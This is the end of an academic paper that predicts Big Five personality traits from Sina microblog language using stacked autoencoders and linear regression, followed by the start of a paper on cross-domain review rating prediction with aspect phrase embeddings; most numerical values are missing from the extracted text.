data for linguistic behavior feature learning through iteration and calculation layer by layer, a deep learning algorithm can mine the internal connections and intrinsic characteristics of linguistic information on social network platforms. assuming that the text in microblogs can reflect users' personality characteristics, for each trait of personality we build a linguistic behavior feature learning model based on the deep learning algorithm to extract the corresponding lrfv from users' expressions on the sina microblog. linguistic inquiry and word count (liwc) is a kind of linguistic statistical analysis software which has been widely used by many researchers to extract attributes of english content from twitter and facebook (golbeck et al., ; golbeck, robles & turner, ). in order to meet the demands of simplified chinese semantic analysis, we developed a simplified chinese psychological linguistic analysis dictionary for the sina microblog (scliwc) (gao et al., ). this dictionary was built based on liwc (tausczik & pennebaker, ) and the traditional chinese version of liwc (cliwc) (huang et al., ). besides referring to the original liwc, we added five thousand words that are most frequently used on the sina microblog to this dictionary. the words in the dictionary are classified into categories according to emotion and meaning, such as positive words, negative words, family, money, punctuation, etc. through analysis and observation, we found that for some factors of personality, users with different scores show great differences in the number of words used that belong to positive emotion, negative emotion and some other categories of the dictionary. according to scliwc (gao et al., ), the users' degree of word usage in blogs can be computed per category. in order to obtain the usage characteristics of social media text in the temporal domain, we first divide the time by week. for the ith word category of scliwc, the usage frequency within the jth week, $f_{ij}$, is calculated by the formula below, in which i denotes the serial number of the category and j denotes the serial number of the week. we collected all the text published on the sina microblog during the recent three years (jun.–jun.), spanning a fixed number of weeks in total. therefore, corresponding to each category of scliwc, the vector $f_i = (f_{i1}, f_{i2}, \ldots, f_{iW})$, where $W$ is the total number of weeks, is the digital representation of the ith category in the temporal domain.
$f_{ij} = \dfrac{\text{number of words belonging to the } i\text{th category of scliwc in the } j\text{th week}}{\text{total number of words in blogs in the } j\text{th week}}$
then, we utilize the fast fourier transform (fft) (loan, ) to obtain the varying characteristics of social media text usage in the temporal space. the fourier transform is a special integral transform which converts the original temporal signal into a frequency-domain signal that is easier to analyze. the fft is the fast algorithm of the discrete fourier transform (dft), defined by
$x(k) = \mathrm{dft}[x(n)] = \sum_{n=0}^{N-1} x(n)\, w_N^{kn}, \quad k = 0, 1, \ldots, N-1$
$w_N = e^{-j \frac{2\pi}{N}}$
in order to extract the temporal information from the massive high-dimensional digital vectors, fourier time-series analysis is considered. concretely, we conduct the fft for each vector. through the fft, the calculated amplitudes include frequency information, and the largest amplitudes are selected to constitute a vector as the representation of each word category.
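a minimal numpy sketch of this temporal feature construction is given below. it is illustrative only; the weekly counts, the number of categories and the number of retained amplitudes are hypothetical, since the exact values are not given here.

```python
import numpy as np

def temporal_category_features(weekly_category_counts, weekly_total_counts, top_k=8):
    """build a per-user linguistic vector: weekly usage frequency per scliwc category,
    transformed by fft, keeping the top-k amplitudes of each category."""
    # weekly_category_counts: shape (n_categories, n_weeks); weekly_total_counts: shape (n_weeks,)
    freq = weekly_category_counts / np.maximum(weekly_total_counts, 1)   # f_ij
    amplitudes = np.abs(np.fft.fft(freq, axis=1))                        # spectrum per category
    top = np.sort(amplitudes, axis=1)[:, ::-1][:, :top_k]                # largest amplitudes first
    return top.ravel()                                                    # concatenate all categories

# toy usage: 10 hypothetical categories observed over 156 weeks
rng = np.random.default_rng(1)
cat_counts = rng.poisson(5, size=(10, 156))
tot_counts = rng.poisson(200, size=156) + 1
vec = temporal_category_features(cat_counts, tot_counts)
print(vec.shape)   # (10 * 8,) features for one user
```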
finally, concatenating the vectors of each category in series, we obtain a linguistic vector of fixed length corresponding to each user id. in our experiment, we used the users' blogs published over three years as data for the preliminary study; each user's linguistic behavior is represented in vector form through the fft based on scliwc. data for personality prediction in order to verify that the deep learning algorithm is an effective method for extracting a representation of a user's sina microblog linguistic behaviors, we built a personality prediction model based on the linguistic behavior feature vectors. the personality prediction model is constructed by a linear regression algorithm. for each volunteer, five linguistic behavior feature vectors corresponding to the five traits of personality are obtained by the feature learning models, respectively. the training process of the personality prediction model is supervised, so the users' five scores for the five personality traits in the big five questionnaire are taken as the labels of the corresponding linguistic behavior feature vectors. methods unsupervised feature learning based on stacked autoencoders feature learning can be seen as a process of dimensionality reduction. in order to improve the computational efficiency, for all traits of personality we utilize a relatively simple form of artificial neural network, the autoencoder (bengio, ). the figure shows the basic structure of an autoencoder. basically, for an autoencoder, the input and output have the same dimensions and both can be taken as x; however, through the mathematical transformation, the input and output may not be completely equal. here, x denotes the input and x′ denotes the output. the variable of the hidden layer, y, is encoded from x by
$y = f_{\theta}(x) = s(w^{T} x + b) = s\left(\sum_{i=1}^{n} w_i x_i + b\right)$
$s(z) = \dfrac{1}{1 + \exp(-z)}$
where {w, b} are parameters which can be obtained through training and s(z) is the sigmoid activation function of the hidden layers. in addition, a reconstructed vector x′ in the input vector space can be obtained by mapping the result of the hidden layer y back through a mapping function,
$x' = g_{\theta'}(y) = s'(w'^{T} y + b') = s\left(\sum_{i=1}^{n} w'_i y_i + b'\right)$
for an autoencoder, if we want the mapping result y to be another representation of the input x, it is assumed that the input x and the reconstruction x′ are the same. according to this assumption, the training process of an autoencoder can be conducted and the parameters of the autoencoder are adjusted so as to minimize the error value l between x and x′, defined as
$l(x; w, b) = \| x' - x \|^{2}$
because the error is computed directly from the comparison between the original input and the obtained reconstruction, the whole training process is unsupervised. several autoencoders are stacked to initialize the deep architecture layer by layer: the hidden layer of the kth layer is used as the input of the (k+1)th layer. we used greedy layer-wise training to obtain the optimal parameters {w, b} of the stacked autoencoder model. that is, the parameters of each layer are trained individually while the parameters of the remainder of the model are frozen; the output of the nth layer is used as the input of the subsequent (n+1)th layer to train its parameters. the number of layers is decided according to the optimal value found over many experiments.
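as an illustration of this training procedure (a minimal sketch, not the authors' implementation; layer sizes, learning rate and epoch count are assumptions), a single autoencoder layer with the sigmoid encoder/decoder and squared reconstruction error can be trained as follows; stacking simply repeats the step on the hidden activations of the previous layer.

```python
import numpy as np

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def train_autoencoder(X, hidden, lr=0.1, epochs=200, seed=0):
    """greedy training of one autoencoder layer by minimising ||x' - x||^2."""
    rng = np.random.default_rng(seed)
    n, d = X.shape
    W1 = rng.normal(0, 0.1, (d, hidden)); b1 = np.zeros(hidden)   # encoder
    W2 = rng.normal(0, 0.1, (hidden, d)); b2 = np.zeros(d)        # decoder
    for _ in range(epochs):
        Y = sigmoid(X @ W1 + b1)           # hidden representation y = s(Wx + b)
        Xr = sigmoid(Y @ W2 + b2)          # reconstruction x'
        d2 = 2 * (Xr - X) / n * Xr * (1 - Xr)      # gradient at the decoder output
        d1 = (d2 @ W2.T) * Y * (1 - Y)             # back-propagated to the encoder
        W2 -= lr * (Y.T @ d2); b2 -= lr * d2.sum(axis=0)
        W1 -= lr * (X.T @ d1); b1 -= lr * d1.sum(axis=0)
    return W1, b1

def stack_autoencoders(X, layer_sizes):
    """greedy layer-wise training: each layer is trained on the previous hidden output."""
    H, params = X, []
    for h in layer_sizes:
        W, b = train_autoencoder(H, h)
        params.append((W, b))
        H = sigmoid(H @ W + b)
    return H, params   # H is the learned feature vector (lrfv-style representation)

# toy usage with random "linguistic vectors" (illustrative only)
X = np.random.rand(50, 40)
features, _ = stack_autoencoders(X, layer_sizes=[20, 10])
print(features.shape)   # (50, 10)
```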
adjusting the number of layers, the configuration that gives the better prediction performance is set as the optimal number of layers. we then take the output of the last layer as the abstract representation of the original linguistic behavior information. the figure shows the structure of our model: for different personality factors, the number of layers and the number of units in each layer are different, and the details are presented on the left of the figure. figure: the training principle diagram of an autoencoder. figure: the deep structure of our prediction model; the left table shows the details of the sae for the different personality factors. for "a," "c" and "n," there is one hidden layer in the sae, and the feature learning model has three layers in total; for "e" and "o," there are two hidden layers in the sae. in our experiments, the users' sina microblog content is used as the training dataset, and the unsupervised feature learning models corresponding to the different personality traits are trained respectively; that is, we obtain five feature learning models in total. for each trait, the corresponding linguistic behavior feature vectors are extracted actively from the social network behavior data. finally, based on the big five questionnaire, for each user we obtain five scores ($s_a$, $s_c$, $s_e$, $s_n$, $s_o$) corresponding to the five factors "a," "c," "e," "n," "o," respectively. these scores are used to label the corresponding linguistic behavior feature vectors for the personality prediction models. personality prediction model based on linear regression personality prediction is a supervised process. the linguistic behavior feature vectors are labeled by the corresponding scores of the big five questionnaire. for the five traits of personality, we utilized the linear regression algorithm to build five personality prediction models in total. taking one trait of personality as an example, the linguistic behavior feature vectors are represented by
$x = \{x_i \mid x_i = (x_{i1}, x_{i2}, \ldots, x_{im})\}_{i=1}^{n}$
in which n is the number of samples and m denotes the number of dimensions of the input vector. the scores of the big five questionnaire are taken as the labels,
$y = \{y_i\}_{i=1}^{n}$
the general form of the linear regression is
$y_i = \omega_1 x_{i1} + \omega_2 x_{i2} + \cdots + \omega_m x_{im} + \varepsilon_i, \quad i = 1, 2, \ldots, n$
we trained five personality prediction models based on the linear regression algorithm using the corresponding linguistic behavior feature vectors and labels. results in the experiments, we collected the users' sina microblog data. the linguistic behavior of the users is quantified based on scliwc, and the temporal characteristics are calculated through the fft. then, we utilize the deep learning algorithm to construct the feature learning models, which extract an objective and comprehensive representation of the linguistic behaviors from the temporal sequence. finally, the personality prediction model is trained by the linear regression algorithm based on the linguistic behavior feature vectors. evaluation measures in this paper, we conducted a preliminary study on constructing a microblog behavior representation for predicting a social media user's personality; all five factors of personality are tested.
we use the pearson product-moment correlation coefficient (r) and the root mean square error (rmse) to measure the quality of the different behavior feature representation methods. the computational formulas of the two measures are shown below. in the formula for r, cov(y, y′) denotes the covariance of y and y′, and var(y) and var(y′) represent the variances of the real score y and the predicted score y′, respectively. when r > 0, the results of the questionnaire and the prediction model have a positive correlation; in contrast, r < 0 means a negative correlation. the greater the absolute value, the higher the degree of correlation. in psychology research, we use cohen's conventions (cohen, ) to interpret the pearson product-moment correlation coefficient: r ∈ [0.1, 0.3) represents a weak or small association and r ∈ [0.3, 0.5) indicates a moderate correlation between two variables. in the formula for rmse, i is the sequence number of the sample and n is the total number of samples. the big five questionnaire used in our experiments contains a fixed set of questions, and each of the five factors "a," "c," "e," "n," "o" has its own score range. the value of rmse shows the average difference between our prediction results and the scores of the questionnaire; the smaller the value of rmse, the better the performance of the prediction model.
$r = \mathrm{cor}(y, y') = \dfrac{\mathrm{cov}(y, y')}{\sqrt{\mathrm{var}(y)\,\mathrm{var}(y')}}$
$\mathrm{rmse} = \sqrt{\dfrac{\sum_{i=1}^{n} (y_i - y'_i)^2}{n}}$
table: comparison of prediction results in terms of the pearson correlation coefficient (ra, rc, re, rn, ro) for the original attributes, the pca attributes, the stepwise attributes, the lasso attributes and the sae attributes. table: comparison of prediction results in terms of rmse for the same five kinds of attributes. table: comparison of the dimensionality of the different feature vectors. experiment results in the comparison experiments, we utilized five different kinds of attributes to train and build the personality prediction model. the five kinds of attributes are: the attributes selected by a manual statistical method without feature selection (the original attributes), the attributes selected from the original attributes by principal component analysis (pca) (dunteman, ), the attributes selected from the original attributes by stepwise selection, the attributes selected from the original attributes by lasso, and the linguistic behavior feature vector obtained from the stacked autoencoders (the sae attributes). pca is a kind of unsupervised feature dimension reduction method, stepwise selection is usually used as a supervised feature selection method, and lasso is a regression analysis method which also performs feature selection. for the different kinds of attributes, the personality prediction models are all built by a linear regression algorithm. in order to obtain a stable model and prevent overfitting for each factor of personality, we use k-fold cross-validation and run repeated randomized experiments; finally, the mean of the randomized experiments' results is recorded as the final prediction result.
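for illustration (this is not the authors' code; the data shapes and the fold protocol shown are assumptions), fitting the linear regression for one trait and scoring it with pearson's r and rmse could look like this.

```python
import numpy as np
from scipy.stats import pearsonr
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import KFold

def evaluate_trait(X, y, n_splits=5, seed=0):
    """cross-validated pearson r and rmse of a linear regression for one personality trait."""
    preds = np.empty_like(y, dtype=float)
    for train, test in KFold(n_splits=n_splits, shuffle=True, random_state=seed).split(X):
        model = LinearRegression().fit(X[train], y[train])
        preds[test] = model.predict(X[test])
    r, _ = pearsonr(y, preds)
    rmse = np.sqrt(np.mean((y - preds) ** 2))
    return r, rmse

# toy usage: hypothetical lrfv features and questionnaire scores for one trait
rng = np.random.default_rng(2)
X = rng.normal(size=(200, 30))
y = X[:, :3].sum(axis=1) + rng.normal(scale=0.5, size=200)   # synthetic scores
print(evaluate_trait(X, y))
```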
the comparison of the prediction results of the five personality factors using the different kinds of attributes is shown in the two comparison tables above, and the third table shows the dimensionality of the different kinds of feature vectors; the subscript letters "a," "c," "e," "n," "o" indicate the different personality factors. discussion this study explores the relevance between users' personality and their social network behaviors. the feature learning models are built to perform an unsupervised extraction of the representations of social network linguistic behaviors. compared with the attributes obtained by some supervised behavior feature extraction methods, the lrfv is more objective, efficient, comprehensive and universal. in addition, based on the lrfv, the accuracy of the personality prediction model can be improved. the performance of the personality prediction model the results in the tables show that the linguistic behavior feature vectors learned through stacked autoencoders perform better than the other attributes in both the pearson correlation coefficient and rmse. when using the sae attributes, the pearson correlation coefficient for "a" represents only a small correlation, while for "e," "n," "c" and "o" the coefficients re, rn, rc and ro indicate that the prediction results correlate with the results of the questionnaire moderately. it is concluded that personality prediction based on linguistic behavior in social networks is feasible; moreover, the traits of conscientiousness and openness are reflected in the network linguistic behavior more obviously. compared with other feature extraction methods, our proposed method performs better. when using the original feature vector, the prediction correlations r are all smaller; when using another kind of unsupervised feature dimension reduction method (pca), all but "c" are also smaller; and with the supervised feature selection method (stepwise), the prediction correlations r are also not ideal. similarly, considering the rmse of every personality trait, the prediction model also obtains better results based on the linguistic behavior feature vectors. besides, we compared the time and memory consumption of prediction when using sae and pca to reduce the dimensionality of the features, as shown in the table below. the experiments were conducted on a dell desktop with an intel core cpu. the average time consumption denotes the average time cost for predicting one personality factor of one sample; the average memory consumption denotes the memory usage percentage when running the prediction model. although pca performed better in time and memory consumption, the prediction results of the linguistic behavior feature vectors were outstanding, and a high-powered computing server can offset the deficiency in time and memory consumption. parameter selection activation function there are many kinds of activation functions in neural networks, such as sigmoid, tanh, softmax, softplus, relu and linear; among them, sigmoid and tanh are the most commonly used. in the experiments, we utilized both of them to construct the feature learning model, and the comparative results (shown in the table below) indicated that when using sigmoid as the activation function of the hidden layers, the prediction results are a bit better.
/ https://peerj.com http://dx.doi.org/ . /peerj-cs. table the comparison of time and memory consuming of different feature vector. attributes average time consuming average memory consuming attribute (pca) ms % attributes sae ms % table the comparison of prediction results when using different activation function. activation function ra rc re rn ro sigmoid . . . . . tanh . . . . . figure the comparison of prediction results using linguistic feature vectors with different dimen- sionality. (a) the comparison of r. (b) the comparison of rmse. the dimensionality of linguistic behavior feature vector for each personality trait, the dimensionality of linguistic behavior feature vector is set according to the optimal result of prediction model obtained from repeated experiments, and the comparison of r and rmse when using linguistic behavior feature vectors with different dimensionality are presented in figs. a and b, respectively. the pearson correlation coefficient reflects the correlation degree between two variables. if the change tendencies of two variables are more similar, the correlation coefficient is higher. root mean square error reflects the bias between the real value and prediction value. for a dataset, the pearson correlation coefficient and root mean square error may not be direct ratio. in practical applications, the trend of the psychological changes is more necessary. so, when adjusting the optimal parameters, we give priority to pearson correlation coefficient. for ‘‘a,’’ ‘‘c’’ and ‘‘n,’’ prediction models perform better when the dimensionality of feature vector is . for ‘‘e’’ and ‘‘o,’’ we could obtain the better results when the dimensionality of feature vector is . differences in modeling performance across personality traits through analysing the results of experiments, we summarize that agreeableness correlate with users’ social network linguistic behaviors relative weakly than the other personality traits. the correlation between openness and users’ social network linguistic behaviors is highest of all. we could identify whether the users own higher scores in openness or not through their blogs published in social network platform, most likely because the liu and zhu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. people with high scores in openness usually prefer to publicly express their thoughts and feelings. similarly, conscientiousness is moderately correlate with social network linguistic behaviors. and for conscientiousness, there are significant differences of using the words belonging to the categories of family, positive emotion and so on. the future work in this paper, we has carried on some preliminary study to explore the feasibility of using deep learning algorithm to construct linguistic feature learning model. more work will be conducted further. millions of users’ social media are being downloaded. in feature extraction, the massive data will be used to train the unsupervised feature learning model. besides, a new round of user experiment is progressing. we would obtain a new set of labeled data to improve our personality prediction method. the study is of great significance. it could provide new quantitative and analytical methods for the social media data, and a new perspective for real-time assessment of internet users’ mental health. 
conclusions in this paper, we utilized a deep learning algorithm to investigate the correlations between users’ personality traits and their social network linguistic behaviors. firstly, the linguistic behavior feature vectors extracted unsupervised using stacked autoencoders models actively. then, the personality prediction models are built based on the linguistic behavior feature vectors by linear regression algorithm. our comparison experiments are conducted on five different kinds of attributes, and the results show that the linguistic behavior feature vectors could improve the performance of personality prediction models. additional information and declarations funding the authors received support from the young talent research fund (y cx ), national basic research program of china ( cb ), and cas strategic priority research program (xda ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: young talent research fund: y cx . national basic research program of china: cb . cas strategic priority research program: xda . competing interests the authors declare there are no competing interests. author contributions • xiaoqian liu conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. liu and zhu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • tingshao zhu conceived and designed the experiments, contributed reagents/material- s/analysis tools, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability. the raw data has been supplied as data s . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references bengio y. . learning deep architectures for ai. foundations and trends in machine learning ( ): – doi . / . bengio y, courville a, vincent p. . representation learning: a review and new perspectives. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . chen j, hu b, moore p, zhang x, ma x. . electroencephalogram-based emotion as- sessment system using ontology and data mining techniques. applied soft computing : – doi . /j.asoc. . . . ciresan d, meier u, schmidhuber j. . multi-column deep neural networks for image classification. in: ieee conference on computer vision and pattern recognition. piscataway: ieee, – . cohen j. . statistical power analysis for the behavioral sciences. vol. . hillsdale: lawrence earlbaum associates. costa pt, mccrae rr. . revised neo personality inventory and neo five-factor inventory (neo-ffi) manual. odessa: psychological assessment resources. dunteman gh. . principal components analysis. sage university paper series on quantitative applications in the social sciences, series no. - . beverly hills: sage publications. funder d. . personality. annual review of psychology : – doi . /annurev.psych. . . . gao r, hao b, li h, gao y, zhu t. . developing simplified chinese psychological linguistic analysis dictionary for microblog. in: international conference on brain health informatics. golbeck j, robles c, edmondson m, turner k. . predicting personality from twitter. 
in: ieee third international conference on privacy, security, risk and trust (passat) and ieee third inernational conference on social computing. passat/socialcom, privacy, security, risk & trust, – . golbeck j, robles c, turner k. . predicting personality with social media. extended abstracts on human factors in computing systems – . liu and zhu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /j.asoc. . . http://dx.doi.org/ . /annurev.psych. . . http://dx.doi.org/ . /peerj-cs. huang cl, chung ck, hui n, lin yc, yi-tai s, lam bcp, chen wc, bond mh, pennebaker jw. . the development of the chinese linguistic inquiry and word count dictionary. chinese journal of psychology : – . huang gb, lee h, learned-miller e. . learning hierarchical representations for face verification with convolutional deep belief networks. in: ieee conference on computer vision and pattern recognition, – . huijie l, jia j, quan g, yuanyuan x, jie h, lianhong c, ling f. a. psychological stress detection from cross-media microblog data using deep sparse neural network. in: proceedings of ieee international conference on multimedia expo. piscataway: ieee. huijie l, jia j, quan g, yuanyuan x, qi l, jie h, lianhong c, ling f. b. user- level psychological stress detection from social media using deep neural network. in: proceedings of the acm international conference on multimedia. new york: acm, – . lima aces, de castro ln. . multi-label semi-supervised classification applied to personality prediction in tweets. in: the th brazilian congress on computational intelligence. – . loan cv. . computational frameworks for the fast fourier transform. siam review ( ): – . mischel w, shoda y, ayduk o. . introduction to personality: toward an integration. th edition. wiley press. ortigosa a, carro rm, quiroga ji. . predicting user personality by mining social interactions in facebook. journal of computer and system sciences ( ): – doi . /j.jcss. . . . qiu l, lin h, ramsay j, yang f. . you are what you tweet: personality expression and perception on twitter. journal of research in personality ( ): – doi . /j.jrp. . . . sibel a, golbeck j. . predicting personality with social behavior: a comparative study. social network analysis and mining ( ) doi . /s - - - . socher r, perelygin a, wu jy, chuang j, manning cd, ng ay, potts c. . recursive deep models for semantic compositionality over a sentiment treebank. in: conference on empirical methods in natural language processing. tausczik yr, pennebaker jw. . the psychological meaning of words: liwc and computerized text analysis methods. journal of language and social psychology ( ): – doi . / x . vazire s, gosling sd. . e-perceptions: personality impressions based on personal websites. journal of personality and social psychology ( ): – doi . / - . . . . vittorio cg, claudio b, laura b, marco p. . the ‘‘big five questionnaire’’: a new questionnaire to assess the five factor model. personality and individual differences ( ): – doi . / - ( ) -r. zhang x, hu b, chen j, moore p. . ontology-based context modeling for emotion recognition in an intelligent web. world wide web-internet and web information systems ( ): – doi . /s - - - . liu and zhu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.jcss. . . 
http://dx.doi.org/ . /j.jrp. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / x http://dx.doi.org/ . / - . . . http://dx.doi.org/ . / - ( ) -r http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. submitted april accepted september published october corresponding author aiqi jiang, a.jiang. @warwick.ac.uk, aiqi.jiang@yahoo.com academic editor eibe frank additional information and declarations can be found on page doi . /peerj-cs. copyright jiang and zubiaga distributed under creative commons cc-by . open access leveraging aspect phrase embeddings for cross-domain review rating prediction aiqi jiang and arkaitz zubiaga university of warwick, coventry, united kingdom queen mary university of london, london, united kingdom abstract online review platforms are a popular way for users to post reviews by expressing their opinions towards a product or service, and they are valuable for other users and companies to find out the overall opinions of customers. these reviews tend to be accompanied by a rating, where the star rating has become the most common approach for users to give their feedback in a quantitative way, generally as a likert scale of – stars. in other social media platforms like facebook or twitter, an automated review rating prediction system can be useful to determine the rating that a user would have given to the product or service. existing work on review rating prediction focuses on specific domains, such as restaurants or hotels. this, however, ignores the fact that some review domains which are less frequently rated, such as dentists, lack sufficient data to build a reliable prediction model. in this paper, we experiment on datasets pertaining to different review domains of varying level of popularity to assess the performance of predictions across different domains. we introduce a model that leverages aspect phrase embeddings extracted from the reviews, which enables the development of both in-domain and cross-domain review rating prediction systems. our experiments show that both of our review rating prediction systems outperform all other baselines. the cross-domain review rating prediction system is particularly significant for the least popular review domains, where leveraging training data from other domains leads to remarkable improvements in performance. the in-domain review rating prediction system is instead more suitable for popular review domains, provided that a model built from training data pertaining to the target domain is more suitable when this data is abundant. subjects artificial intelligence, computational linguistics, data science, natural language and speech keywords aspect phrase embeddings, review rating prediction, sentiment analysis, social media, cross-domain reviews, yelp, amazon, tripadvisor, word embeddings, multinomial logistic regression introduction in recent years, the advent and the prevalent popularisation of social media has led to a change in users’ habits of surfing the internet (kaplan & haenlein, ; quan-haase & young, ; perrin, ; goss, ). since the emergence of social media platforms, internet users are no longer limited to browsing online contents as mere readers, but they also can also contribute by expressing and sharing their opinions (salehan, zhang & aghakhani, ). users can freely post comments and share experiences on target entities how to cite this article jiang a, zubiaga a. . leveraging aspect phrase embeddings for cross-domain review rating prediction. peerj comput. sci. :e http://doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ mailto:a.jiang. @warwick.ac.uk mailto:aiqi.jiang@yahoo.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. such as products, businesses or events on online review platforms like http://yelp.com or http://amazon.com (salehan & kim, ; xing et al., ). these reviews present the subjective opinions of people on products or businesses, which are invaluable for consumers and companies (sparks & browning, ). given the volume of these reviews and the fact that they are spread on different sites across the internet, it becomes more challenging and costly to aggregate all the reviews on a particular product or business (zhang & qu, ). to alleviate the cost of this task, there is a need to explore the development of automated review rating prediction systems. there has been work in the scientific literature looking at review rating prediction (li et al., ; fan & khademi, ; seo et al., a; wang et al., ; xing et al., ; wang et al., ). this work has however been limited to the prediction of ratings of reviews in very popular domains, such as restaurants (ganu, elhadad & marian, ; zhang et al., ; laddha & mukherjee, ; xing et al., ), hotels (zhao, qian & xie, ; laddha & mukherjee, ) or movies (ning et al., in press). for these domains, it is relatively easy to get a large-scale dataset from online sources for training a review rating prediction system, thanks to sites like tripadvisor or yelp where large collections of rated reviews are publicly accessible. the task can however become more challenging for less popular domains, where the dearth of rated reviews available online inevitably means that the scarcity of labelled data available to train a rating prediction model will be rather limited. moreover, the variance in vocabulary across different domains makes it more difficult to develop a prediction system that generalises to different domains; while reviewers are expected to use phrases like well written or entertaining book to express that they liked a book, a different vocabulary is expected to indicate that they liked a dentist, such as careful treatment or clean office. our work builds on the idea that these phrases, associated with different aspects that vary across domains, can be effectively leveraged for the review rating prediction if the barriers between domains are reduced. to the best of our knowledge, review rating prediction for non-popular domains has not been studied in previous work, and our work is the first attempt to do so. we propose to pursue review rating prediction for non-popular domains by developing a cross-domain rating prediction system, where rated reviews from popular domains can be leveraged to build a model which can then be generalised to non-popular domains. to facilitate and ensure the effectiveness of building a model that will generalise to other domains, we propose an approach for generating aspect phrase embeddings and polarised aspect phrase embeddings, where phrases that vary across domains can be brought to a common semantic space by using word embeddings. 
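as a brief illustration of this idea, the sketch below trains a word2vec model on tokenised review text and compares aspect phrases from different domains in the shared embedding space by summing their word vectors; it assumes the gensim library, and the toy corpus, phrase pairs and parameter values are illustrative assumptions rather than the configuration used in this paper.

```python
import numpy as np
from gensim.models import Word2Vec

# toy corpus standing in for tokenised review sentences from several domains
sentences = [
    ["the", "food", "was", "good", "and", "the", "service", "was", "great"],
    ["very", "comfortable", "bed", "and", "a", "clean", "room"],
    ["an", "inspiring", "novel", "that", "is", "well", "written"],
    ["careful", "treatment", "and", "a", "clean", "office"],
]

# a single embedding model trained over reviews from all domains
model = Word2Vec(sentences, vector_size=100, window=5, min_count=1, epochs=50, seed=1)

def phrase_vector(phrase):
    """Represent an aspect phrase by summing the embeddings of its words."""
    words = [w for w in phrase if w in model.wv]
    return np.sum([model.wv[w] for w in words], axis=0)

def cosine(u, v):
    return float(np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v)))

# phrases from different review domains land in the same semantic space,
# so their closeness can be measured directly
print(cosine(phrase_vector(("good", "food")), phrase_vector(("comfortable", "bed"))))
```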
in this work we make the following contributions: • we introduce the first cross-domain review rating prediction system that creates semantic representations of aspect phrases using word embeddings to enable training from large-scale, popular domains, to then be applied to less popular domains where labelled data is limited. • we perform experiments with datasets pertaining to different types of businesses of different levels of popularity. jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://yelp.com http://amazon.com http://dx.doi.org/ . /peerj-cs. • our analysis shows that, while an in-domain review rating prediction system is better for popular domains, for the least popular domains our cross-domain review rating prediction system leads to improved performance when we make use of aspect phrase embeddings. • different from an in-domain prediction system, our cross-domain system can be effectively applied to a wide range of product domains found on the internet that do not necessarily have proper review rating systems to collect labelled data from. • our classifier outperforms the results of a ncf (cheng et al., ), a state-of-the-art rating prediction system, in out of domains, showing its generalisability across domains of different levels of popularity. related work there has been a body of research in sentiment analysis in recent years (liu & zhang, ). this research has worked in different directions by looking into lexicon-based approaches (hu & liu, ; taboada et al., ), machine learning methods (pang, lee & vaithyanathan, ; ye, zhang & law, ; tripathy, agrawal & rath, ) and deep learning techniques (wang et al., ; poria et al., ; zhang, wang & liu, ; xing et al., ). different from the sentiment analysis task, the review rating prediction task consists of determining the score—as a rating between and —that a user would give to a product or business, having the review text as input. while this may at first seem like a fine-grained sentiment analysis task, which is a translation of a textual view to a numerical perspective and consists of choosing one of five labels rather than three labels (positive, neutral, negative), there are two key characteristics that make the review rating prediction task different. first, the sentiment of a review is not necessarily the same as the rating, as a user may express a positive attitude when sharing a low rating opinion of a business, e.g., ‘‘i very much enjoyed my friend’s birthday celebration, however the food here is below standard and we won’t be coming back’’. and second, a review tends to discuss different aspects of a business, some of which may be more important than others towards the rating score, e.g., in a review saying that ‘‘the food was excellent and we loved the service, although that makes the place a bit pricey’’, a user may end up giving it a relatively high score given that key aspects such as the food and the service were considered very positive. in addition, the review can discuss different aspects, and the set of aspects discussed in each review can vary, with some users not caring about certain aspects; e.g., one user focuses on food while another one focuses more on price (ganu, elhadad & marian, ). using the same star rating mode to express the score of specific features can be more helpful to find users’ interests. hence, we argue that a review rating prediction system needs to consider the opinions towards different aspects of a business. 
we achieve this by extracting aspect phrases mentioned in different sentences or segments of a review, which are then aggregated to determine the overall review rating. despite the increasing volume of research in review rating prediction, which we discuss in what follows, research in cross-domain review rating prediction is still unstudied. this is particularly important for less popular review domains where labelled data is scarce and hence one may need to exploit labelled data from a different, more popular domain for training a classifier. jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. review rating prediction has commonly been regarded as a classification task, but also as a regression task on a few occasions (li et al., ; pang & lee, ; mousavizadeh, koohikamali & salehan, ). the text of the review is the input that is consistently used by most existing works (qu, ifrim & weikum, ; leung, chan & chung, ; mousavizadeh, koohikamali & salehan, ), however many of them also incorporate other features extracted from the product being reviewed or from the user writing the review (qu, ifrim & weikum, ). ganu, elhadad & marian ( ) improved the review rating prediction accuracy by implementing new ad-hoc and regression-based recommendation measures, where the aspect of user reviews is considered; their study was however limited to only restaurant reviews and other domains were not studied. a novel kind of bag-of-opinions representation (qu, ifrim & weikum, ) was proposed and each opinion consists of three parts, namely a root term, a set of modifier terms from the same sentence, and one or more negation terms. this approach shows a better performance than prior state-of-the-art techniques for review rating prediction. datasets including three review domains were used for their experiments, however they ran separate experiments for each domain and did not consider the case of domains lacking training data. similarly, wang, lu & zhai ( ) 